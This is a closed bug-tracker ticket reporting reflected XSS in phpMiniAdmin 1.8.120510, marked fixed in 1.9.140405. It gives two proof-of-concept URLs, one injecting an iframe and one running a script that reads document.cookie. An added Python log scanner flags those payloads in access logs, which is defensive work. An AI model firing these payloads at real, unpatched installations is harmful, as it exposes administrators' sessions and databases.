
#13 xss

Group: v1.0 (example)
Status: closed-fixed
Owner: nobody
Labels: None
Priority: 5
Updated: 2014-04-05
Created: 2013-01-22
Creator: Raul DIaz
Private: No

phpMiniAdmin 1.8.120510 Multiple xss by :Dshellnoi_Unix
#P.O.C#
http://[ip]/phpminiadmin.php?XSS=07c0922BDE0aaa&db=information_schema&q=SHOW+TABLE+STATUS+%3Ciframe%20src=%22http://xssed.com%22%3E

http://[ip]/phpminiadmin.php?XSS=07c0922BDE0aaa&refresh=&p=&db=<script>alert(document.cookie)</script>&q=
#proof
http://www.freeimagehosting.net/cap87
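
A defender-side check for the requests reported above, as an added example that is not part of the original ticket or of phpMiniAdmin: it scans web-server access-log lines for calls to phpminiadmin.php whose db or q parameter decodes to HTML markup. The log lines, client addresses and the function name find_markup_requests are constructed for illustration; the two flagged query strings follow the ticket.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format). Addresses, timestamps
# and the benign requests are made up; lines 1 and 2 mirror the ticket.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jan/2013:10:00:01 +0000] "GET /phpminiadmin.php?XSS=07c0922BDE0aaa&db=information_schema&q=SHOW+TABLE+STATUS+%3Ciframe%20src=%22http://xssed.com%22%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [22/Jan/2013:10:00:09 +0000] "GET /phpminiadmin.php?XSS=07c0922BDE0aaa&refresh=&p=&db=%3Cscript%3Ealert(document.cookie)%3C/script%3E&q= HTTP/1.1" 200 498',
    '198.51.100.7 - - [22/Jan/2013:10:02:30 +0000] "GET /phpminiadmin.php?db=shop&q=SELECT+*+FROM+t+WHERE+a+%3C+5 HTTP/1.1" 200 733',
    '198.51.100.7 - - [22/Jan/2013:10:03:00 +0000] "GET /search.php?q=%3Cb%3Ebold%3C/b%3E HTTP/1.1" 200 120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# "<" directly followed by a letter, "/" or "!" starts an HTML tag or comment.
# A SQL comparison written as "a < 5" does not match; "a<b" would, so treat
# hits as leads to review, not as proof.
TAG_RE = re.compile(r"<[A-Za-z/!]")
WATCHED_PARAMS = ("db", "q")  # the two parameters named in the ticket


def find_markup_requests(lines, script="phpminiadmin.php"):
    """Return (line_no, param, decoded_value) for watched params carrying markup."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line we understand
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/" + script):
            continue  # only the admin script is in scope
        # parse_qs percent-decodes values and turns "+" into a space.
        params = parse_qs(url.query, keep_blank_values=True)
        for name in WATCHED_PARAMS:
            for value in params.get(name, []):
                if TAG_RE.search(value):
                    hits.append((no, name, value))
    return hits


if __name__ == "__main__":
    for no, name, value in find_markup_requests(SAMPLE_LOG):
        print(f"line {no}: parameter {name!r} carries markup: {value!r}")
```

The check only reads GET query strings, so values sent in a POST body are not covered.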

Discussion

  • Oleg Savchuk
    2014-04-05

    • status: open --> closed-fixed
    • Group: --> v1.0 (example)
     
  • Oleg Savchuk
    2014-04-05

    fixed in version 1.9.140405